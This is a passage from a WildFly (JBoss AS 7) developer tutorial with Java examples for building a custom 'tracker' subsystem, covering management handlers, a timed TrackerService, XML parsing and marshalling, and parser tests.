archetype.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemRemove extends AbstractRemoveStepHandler {\n\u00a0\n static final SubsystemRemove INSTANCE = new SubsystemRemove();\n\u00a0\n private final Logger log = Logger.getLogger(SubsystemRemove.class);\n\u00a0\n private SubsystemRemove() {\n }\n}\n----\n\nThe description provider for the remove operation is simple and quite\nsimilar to that of the add handler where just name of the method\nchanges.\n\n[[registering-the-subsystem-child]]\n=== Registering the subsystem child\n\nThe `type` child does not exist in our skeleton project so we need to\nimplement the operations to add and remove them from the model.\n\nFirst we need an add operation to add the `type` child, create a class\ncalled `com.acme.corp.tracker.extension.TypeAddHandler`. In this case we\nextend the `org.jboss.as.controller.AbstractAddStepHandler` class and\nimplement the `org.jboss.as.controller.descriptions.DescriptionProvider`\ninterface. `org.jboss.as.controller.OperationStepHandler` is the main\ninterface for the operation handlers, and `AbstractAddStepHandler` is an\nimplementation of that which does the plumbing work for adding a\nresource to the model.\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeAddHandler extends AbstractAddStepHandler implements DescriptionProvider {\n\u00a0\n public static final TypeAddHandler INSTANCE = new TypeAddHandler();\n\u00a0\n private TypeAddHandler() {\n }\n----\n\nThen we define subsystem model. Lets call it `TypeDefinition` and for\nease of use let it extend `SimpleResourceDefinition` instead just\nimplement `ResourceDefinition`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeDefinition extends SimpleResourceDefinition {\n\u00a0\n\u00a0public static final TypeDefinition INSTANCE = new TypeDefinition();\n\u00a0\n\u00a0\/\/we define attribute named tick\nprotected static final SimpleAttributeDefinition TICK =\nnew SimpleAttributeDefinitionBuilder(TrackerExtension.TICK, ModelType.LONG)\n .setAllowExpression(true)\n .setXmlName(TrackerExtension.TICK)\n .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n .setDefaultValue(new ModelNode(1000))\n .setAllowNull(false)\n .build();\n\u00a0\nprivate TypeDefinition(){\n\u00a0 super(TYPE_PATH, TrackerExtension.getResourceDescriptionResolver(TYPE),TypeAdd.INSTANCE,TypeRemove.INSTANCE);\n}\n\u00a0\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\u00a0\n}\n----\n\nWhich will take care of describing the model for us. As you can see in\nexample above we define `SimpleAttributeDefinition` named `TICK`, this\nis a mechanism to define Attributes in more type safe way and to add\nmore common API to manipulate attributes. As you can see here we define\ndefault value of 1000 as also other constraints and capabilities. There\ncould be other properties set such as validators, alternate names, xml\nname, flags for marking it attribute allows expressions and more.\n\nThen we do the work of updating the model by implementing the\n`populateModel()` method from the `AbstractAddStepHandler`, which\npopulates the model's attribute from the operation parameters. First we\nget hold of the model relative to the address of this operation (we will\nsee later that we will register it against `\/subsystem=tracker\/type=*`),\nso we just specify an empty relative address, and we then populate our\nmodel with the parameters from the operation. There is operation\n`validateAndSet` on `AttributeDefinition` that helps us validate and set\nthe model based on definition of the attribute.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n TICK.validateAndSet(operation,model);\n }\n----\n\nWe then override the `performRuntime()` method to perform our runtime\nchanges, which in this case involves installing a service into the\ncontroller at the heart of WildFly. (\n`AbstractAddStepHandler.performRuntime()` is similar to\n`AbstractBoottimeAddStepHandler.performBoottime()` in that the model is\nupdated before runtime changes are made.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model,\n ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n throws OperationFailedException {\n String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n long tick = TICK.resolveModelAttribute(context,model).asLong();\n TrackerService service = new TrackerService(suffix, tick);\n ServiceName name = TrackerService.createServiceName(suffix);\n ServiceController<TrackerService> controller = context.getServiceTarget()\n .addService(name, service)\n .addListener(verificationHandler)\n .setInitialMode(Mode.ACTIVE)\n .install();\n newControllers.add(controller);\n }\n}\n----\n\nSince the add methods will be of the format\n`\/subsystem=tracker\/suffix=war:add(tick=1234)`, we look for the last\nelement of the operation address, which is `war` in the example just\ngiven and use that as our suffix. We then create an instance of\nTrackerService and install that into the `service target` of the context\nand add the created `service controller` to the `newControllers` list.\n\nThe tracker service is quite simple. All services installed into WildFly\nmust implement the `org.jboss.msc.service.Service` interface.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TrackerService implements Service<TrackerService>{\n----\n\nWe then have some fields to keep the tick count and a thread which when\nrun outputs all the deployments registered with our service.\n\n[source,java,options=\"nowrap\"]\n----\nprivate AtomicLong tick = new AtomicLong(10000);\n\u00a0\n private Set<String> deployments = Collections.synchronizedSet(new HashSet<String>());\n private Set<String> coolDeployments = Collections.synchronizedSet(new HashSet<String>());\n private final String suffix;\n\u00a0\n private Thread OUTPUT = new Thread() {\n @Override\n public void run() {\n while (true) {\n try {\n Thread.sleep(tick.get());\n System.out.println(\"Current deployments deployed while \" + suffix + \" tracking active:\\n\" + deployments\n + \"\\nCool: \" + coolDeployments.size());\n } catch (InterruptedException e) {\n interrupted();\n break;\n }\n }\n }\n };\n\u00a0\n public TrackerService(String suffix, long tick) {\n this.suffix = suffix;\n this.tick.set(tick);\n }\n----\n\nNext we have three methods which come from the `Service` interface.\n`getValue()` returns this service, `start()` is called when the service\nis started by the controller, `stop` is called when the service is\nstopped by the controller, and they start and stop the thread outputting\nthe deployments.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n public TrackerService getValue() throws IllegalStateException, IllegalArgumentException {\n return this;\n }\n\u00a0\n @Override\n public void start(StartContext context) throws StartException {\n OUTPUT.start();\n }\n\u00a0\n @Override\n public void stop(StopContext context) {\n OUTPUT.interrupt();\n }\n----\n\nNext we have a utility method to create the `ServiceName` which is used\nto register the service in the controller.\n\n[source,java,options=\"nowrap\"]\n----\npublic static ServiceName createServiceName(String suffix) {\n return ServiceName.JBOSS.append(\"tracker\", suffix);\n}\n----\n\nFinally we have some methods to add and remove deployments, and to set\nand read the `tick`. The 'cool' deployments will be explained later.\n\n[source,java,options=\"nowrap\"]\n----\npublic void addDeployment(String name) {\n deployments.add(name);\n }\n\u00a0\n public void addCoolDeployment(String name) {\n coolDeployments.add(name);\n }\n\u00a0\n public void removeDeployment(String name) {\n deployments.remove(name);\n coolDeployments.remove(name);\n }\n\u00a0\n void setTick(long tick) {\n this.tick.set(tick);\n }\n\u00a0\n public long getTick() {\n return this.tick.get();\n }\n}\/\/TrackerService - end\n----\n\nSince we are able to add `type` children, we need a way to be able to\nremove them, so we create a\n`com.acme.corp.tracker.extension.TypeRemoveHandler`. In this case we\nextend `AbstractRemoveStepHandler` which takes care of removing the\nresource from the model so we don't need to override its\n`performRemove()` operationa. But we need to implement the\n`DescriptionProvider` method to provide the model description, and since\nthe add handler installs the TrackerService, we need to remove that in\nthe `performRuntime()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class TypeRemoveHandler extends AbstractRemoveStepHandler {\n\u00a0\n public static final TypeRemoveHandler INSTANCE = new TypeRemoveHandler();\n\u00a0\n private TypeRemoveHandler() {\n }\n\u00a0\n\u00a0\n @Override\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model) throws OperationFailedException {\n String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n ServiceName name = TrackerService.createServiceName(suffix);\n context.removeService(name);\n }\n\u00a0\n}\n----\n\nWe then need a description provider for the `type` part of the model\nitself, so we modify TypeDefinitnion to registerAttribute\n\n[source,java,options=\"nowrap\"]\n----\nclass TypeDefinition{\n...\n@Override\npublic void registerAttributes(ManagementResourceRegistration resourceRegistration){\n resourceRegistration.registerReadWriteAttribute(TICK, null, TrackerTickHandler.INSTANCE);\n}\n\u00a0\n}\n----\n\nThen finally we need to specify that our new `type` child and associated\nhandlers go under `\/subsystem=tracker\/type=*` in the model by adding\nregistering it with the model in `SubsystemExtension.initialize()`. So\nwe add the following just before the end of the method.\n\n[source,java,options=\"nowrap\"]\n----\n@Override\npublic void initialize(ExtensionContext context)\n{\n final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(TrackerSubsystemDefinition.INSTANCE);\n \/\/Add the type child\n ManagementResourceRegistration typeChild = registration.registerSubModel(TypeDefinition.INSTANCE);\n subsystem.registerXMLElementWriter(parser);\n}\n----\n\nThe above first creates a child of our main subsystem registration for\nthe relative address `type=*`, and gets the `typeChild` registration. +\nTo this we add the `TypeAddHandler` and `TypeRemoveHandler`. +\nThe add variety is added under the name `add` and the remove handler\nunder the name `remove`, and for each registered operation handler we\nuse the handler singleton instance as both the handler parameter and as\nthe `DescriptionProvider`.\n\nFinally, we register `tick` as a read\/write attribute, the null\nparameter means we don't do anything special with regards to reading it,\nfor the write handler we supply it with an operation handler called\n`TrackerTickHandler`. +\nRegistering it as a read\/write attribute means we can use the\n`:write-attribute` operation to modify the value of the parameter, and\nit will be handled by `TrackerTickHandler`.\n\nNot registering a write attribute handler makes the attribute read only.\n\n`TrackerTickHandler` extends `AbstractWriteAttributeHandler` +\ndirectly, and so must implement its `applyUpdateToRuntime` and\n`revertUpdateToRuntime` method. +\nThis takes care of model manipulation (validation, setting) but leaves\nus to do just to deal with what we need to do.\n\n[source,java,options=\"nowrap\"]\n----\nclass TrackerTickHandler extends AbstractWriteAttributeHandler<Void> {\n\u00a0\n public static final TrackerTickHandler INSTANCE = new TrackerTickHandler();\n\u00a0\n private TrackerTickHandler() {\n super(TypeDefinition.TICK);\n }\n\u00a0\n protected boolean applyUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName,\n ModelNode resolvedValue, ModelNode currentValue, HandbackHolder<Void> handbackHolder) throws OperationFailedException {\n\u00a0\n modifyTick(context, operation, resolvedValue.asLong());\n\u00a0\n return false;\n }\n\u00a0\n protected void revertUpdateToRuntime(OperationContext context, ModelNode operation, String attributeName, ModelNode valueToRestore, ModelNode valueToRevert, Void handback){\n modifyTick(context, operation, valueToRestore.asLong());\n }\n\u00a0\n private void modifyTick(OperationContext context, ModelNode operation, long value) throws OperationFailedException {\n\u00a0\n final String suffix = PathAddress.pathAddress(operation.get(ModelDescriptionConstants.ADDRESS)).getLastElement().getValue();\n TrackerService service = (TrackerService) context.getServiceRegistry(true).getRequiredService(TrackerService.createServiceName(suffix)).getValue();\n service.setTick(value);\n }\n\u00a0\n}\n----\n\nThe operation used to execute this will be of the form\n`\/subsystem=tracker\/type=war:write-attribute(name=tick,value=12345`) so\nwe first get the `suffix` from the operation address, and the `tick`\nvalue from the operation parameter's `resolvedValue` parameter, and use\nthat to update the model.\n\nWe then add a new step associated with the `RUNTIME` stage to update the\ntick of the TrackerService for our suffix. This is essential since the\ncall to `context.getServiceRegistry()` will fail unless the step\naccessing it belongs to the `RUNTIME` stage.\n\n[NOTE]\n\nWhen implementing `execute()`, you *must* call `context.completeStep()`\nwhen you are done.\n\n[[parsing-and-marshalling-of-the-subsystem-xml]]\n== Parsing and marshalling of the subsystem xml\n\nWildFly uses the Stax API to parse the xml files. This is initialized in\n`SubsystemExtension` by mapping our parser onto our namespace:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/** The name space used for the {@code subsystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n protected static final PathElement SUBSYSTEM_PATH = PathElement.pathElement(SUBSYSTEM, SUBSYSTEM_NAME);\n\u00a0\u00a0\u00a0 protected static final PathElement TYPE_PATH = PathElement.pathElement(TYPE);\n\u00a0\n \u00a0\/** The parser used for parsing our subsystem *\/\n private final SubsystemParser parser = new SubsystemParser();\n\u00a0\n \u00a0@Override\n public void initializeParsers(ExtensionParsingContext context) {\n context.setSubsystemXmlMapping(NAMESPACE, parser);\n }\n ...\n----\n\nWe then need to write the parser. The contract is that we read our\nsubsystem's xml and create the operations that will populate the model\nwith the state contained in the xml. These operations will then be\nexecuted on our behalf as part of the parsing process. The entry point\nis the `readElement()` method.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/**\n * The subsystem parser, which uses stax to read and write to and from xml\n *\/\n private static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n\u00a0\n \/** {@inheritDoc} *\/\n @Override\n public void readElement(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n \/\/ Require no attributes\n ParseUtils.requireNoAttributes(reader);\n\u00a0\n \/\/Add the main subsystem 'add' operation\n final ModelNode subsystem = new ModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 subsystem.get(OP).set(ADD);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 subsystem.get(OP_ADDR).set(PathAddress.pathAddress(SUBSYSTEM_PATH).toModelNode());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 list.add(subsystem);\n\u00a0\n \/\/Read the children\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (!reader.getLocalName().equals(\"deployment-types\")) {\n throw ParseUtils.unexpectedElement(reader);\n }\n while (reader.hasNext() && reader.nextTag() != END_ELEMENT) {\n if (reader.isStartElement()) {\n readDeploymentType(reader, list);\n }\n }\n }\n }\n\u00a0\n private void readDeploymentType(XMLExtendedStreamReader reader, List<ModelNode> list) throws XMLStreamException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (!reader.getLocalName().equals(\"deployment-type\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.unexpectedElement(reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode addTypeOperation = new ModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 addTypeOperation.get(OP).set(ModelDescriptionConstants.ADD);\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String suffix = null;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 for (int i = 0; i < reader.getAttributeCount(); i++) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String attr = reader.getAttributeLocalName(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String value = reader.getAttributeValue(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (attr.equals(\"tick\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 TypeDefinition.TICK.parseAndSetParameter(value, addTypeOperation, reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } else if (attr.equals(\"suffix\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 suffix = value;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } else {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.unexpectedAttribute(reader, i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ParseUtils.requireNoContent(reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (suffix == null) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.missingRequiredElement(reader, Collections.singleton(\"suffix\"));\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Add the 'add' operation for each 'type' child\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(TYPE, suffix));\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 addTypeOperation.get(OP_ADDR).set(addr.toModelNode());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 list.add(addTypeOperation);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n ...\n----\n\nSo in the above we always create the add operation for our subsystem.\nDue to its address `\/subsystem=tracker` defined by `SUBSYSTEM_PATH` this\nwill trigger the `SubsystemAddHandler` we created earlier when we invoke\n`\/subsystem=tracker:add`. We then parse the child elements and create an\nadd operation for the child address for each `type` child. Since the\naddress will for example be `\/subsystem=tracker\/type=sar` (defined by\n`TYPE_PATH` ) and `TypeAddHandler` is registered for all `type`\nsubaddresses the `TypeAddHandler` will get invoked for those operations.\nNote that when we are parsing attribute `tick` we are using definition\nof attribute that we defined in TypeDefintion to parse attribute value\nand apply all rules that we specified for this attribute, this also\nenables us to property support expressions on attributes.\n\nThe parser is also used to marshal the model to xml whenever something\nmodifies the model, for which the entry point is the `writeContent()`\nmethod:\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n ...\n \/** {@inheritDoc} *\/\n @Override\n public void writeContent(final XMLExtendedStreamWriter writer, final SubsystemMarshallingContext context) throws XMLStreamException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Write out the main subsystem element\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 context.startSubsystemElement(TrackerExtension.NAMESPACE, false);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeStartElement(\"deployment-types\");\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode node = context.getModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode type = node.get(TYPE);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 for (Property property : type.asPropertyList()) {\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/write each child element to xml\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeStartElement(\"deployment-type\");\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeAttribute(\"suffix\", property.getName());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode entry = property.getValue();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 TypeDefinition.TICK.marshallAsAttribute(entry, true, writer);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeEndElement();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/End deployment-types\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeEndElement();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/End subsystem\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeEndElement();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n }\n----\n\nThen we have to implement the `SubsystemDescribeHandler` which\ntranslates the current state of the model into operations similar to the\nones created by the parser. The `SubsystemDescribeHandler` is only used\nwhen running in a managed domain, and is used when the host controller\nqueries the domain controller for the configuration of the profile used\nto start up each server. In our case the `SubsystemDescribeHandler` adds\nthe operation to add the subsystem and then adds the operation to add\neach `type` child. Since we are using ResourceDefinitinon for defining\nsubsystem all that is generated for us, but if you want to customize\nthat you can do it by implementing it like this.\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemDescribeHandler implements OperationStepHandler, DescriptionProvider {\n static final SubsystemDescribeHandler INSTANCE = new SubsystemDescribeHandler();\n\u00a0\n public void execute(OperationContext context, ModelNode operation) throws OperationFailedException {\n \/\/Add the main operation\n context.getResult().add(createAddSubsystemOperation());\n\u00a0\n \/\/Add the operations to create each child\n\u00a0\n ModelNode node = context.readModel(PathAddress.EMPTY_ADDRESS);\n for (Property property : node.get(\"type\").asPropertyList()) {\n\u00a0\n ModelNode addType = new ModelNode();\n addType.get(OP).set(ModelDescriptionConstants.ADD);\n PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(\"type\", property.getName()));\n addType.get(OP_ADDR).set(addr.toModelNode());\n if (property.getValue().hasDefined(\"tick\")) {\n \u00a0TypeDefinition.TICK.validateAndSet(property,addType);\n }\n context.getResult().add(addType);\n }\n context.completeStep();\n }\n\u00a0\n\u00a0\n}\n----\n\n[[testing-the-parsers]]\n=== Testing the parsers\n\nChanges to tests between 7.0.0 and 7.0.1\n\n[NOTE]\n\nThe testing framework was moved from the archetype into the core JBoss\nAS 7 sources between JBoss AS 7.0.0 and JBoss AS 7.0.1, and has been\nimproved upon and is used internally for testing JBoss AS 7's\nsubsystems. The differences between the two versions is that in\n7.0.0.Final the testing framework is bundled with the code generated by\nthe archetype (in a sub-package of the package specified for your\nsubsystem, e.g. `com.acme.corp.tracker.support`), and the test extends\nthe `AbstractParsingTest` class.\n\nFrom 7.0.1 the testing framework is now brought in via the\n`org.jboss.as:jboss-as-subsystem-test` maven artifact, and the test's\nsuperclass is `org.jboss.as.subsystem.test.AbstractSubsystemTest`. The\nconcepts are the same but more and more functionality will be available\nas JBoss AS 7 is developed.\n\nNow that we have modified our parsers we need to update our tests to\nreflect the new model. There are currently three tests testing the basic\nfunctionality, something which is a lot easier to debug from your IDE\nbefore you plug it into the application server. We will talk about these\ntests in turn and they all live in\n`com.acme.corp.tracker.extension.SubsystemParsingTestCase`.\n`SubsystemParsingTestCase` extends `AbstractSubsystemTest` which does a\nlot of the setup for you and contains utility methods for verifying\nthings from your test. See the javadoc of that class for more\ninformation about the functionality available to you. And by all means\nfeel free to add more tests for your subsystem, here we are only testing\nfor the best case scenario while you will probably want to throw in a\nfew tests for edge cases.\n\nThe first test we need to modify is `testParseSubsystem()`. It tests\nthat the parsed xml becomes the expected operations that will be parsed\ninto the server, so let us tweak this test to match our subsystem. First\nwe tell the test to parse the xml into operations\n\n[source,xml,options=\"nowrap\"]\n----\n@Test\n public void testParseSubsystem() throws Exception {\n \/\/Parse the subsystem xml into operations\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n List<ModelNode> operations = super.parse(subsystemXml);\n----\n\nThere should be one operation for adding the subsystem itself and an\noperation for adding the `deployment-type`, so check we got two\noperations\n\n[source,java,options=\"nowrap\"]\n----\n\/\/\/Check that we have the expected number of operations\n Assert.assertEquals(2, operations.size());\n----\n\nNow check that the first operation is `add` for the address\n`\/subsystem=tracker`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that each operation has the correct content\n \/\/The add subsystem operation will happen first\n ModelNode addSubsystem = operations.get(0);\n Assert.assertEquals(ADD, addSubsystem.get(OP).asString());\n PathAddress addr = PathAddress.pathAddress(addSubsystem.get(OP_ADDR));\n Assert.assertEquals(1, addr.size());\n PathElement element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n----\n\nThen check that the second operation is `add` for the address\n`\/subsystem=tracker`, and that `12345` was picked up for the value of\nthe `tick` parameter:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Then we will get the add type operation\n ModelNode addType = operations.get(1);\n Assert.assertEquals(ADD, addType.get(OP).asString());\n Assert.assertEquals(12345, addType.get(\"tick\").asLong());\n addr = PathAddress.pathAddress(addType.get(OP_ADDR));\n Assert.assertEquals(2, addr.size());\n element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n element = addr.getElement(1);\n Assert.assertEquals(\"type\", element.getKey());\n Assert.assertEquals(\"tst\", element.getValue());\n }\n----\n\nThe second test we need to modify is `testInstallIntoController()` which\ntests that the xml installs properly into the controller. In other words\nwe are making sure that the `add` operations we created earlier work\nproperly. First we create the xml and install it into the controller.\nBehind the scenes this will parse the xml into operations as we saw in\nthe last test, but it will also create a new controller and boot that up\nusing the created operations\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testInstallIntoController() throws Exception {\n \/\/Parse the subsystem xml and install into the controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nThe returned `KernelServices` allow us to execute operations on the\ncontroller, and to read the whole model.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Read the whole model and make sure it looks as expected\n ModelNode model = services.readWholeModel();\n \/\/Useful for debugging :-)\n \/\/System.out.println(model);\n----\n\nNow we make sure that the structure of the model within the controller\nhas the expected format and values\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n }\n----\n\nThe last test provided is called `testParseAndMarshalModel()`. It's main\npurpose is to make sure that our `SubsystemParser.writeContent()` works\nas expected. This is achieved by starting a controller in the same way\nas before\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testParseAndMarshalModel() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nNow we read the model and the xml that was persisted from the first\ncontroller, and use that xml to start a second controller\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the persisted xml from the first controller\n ModelNode modelA = 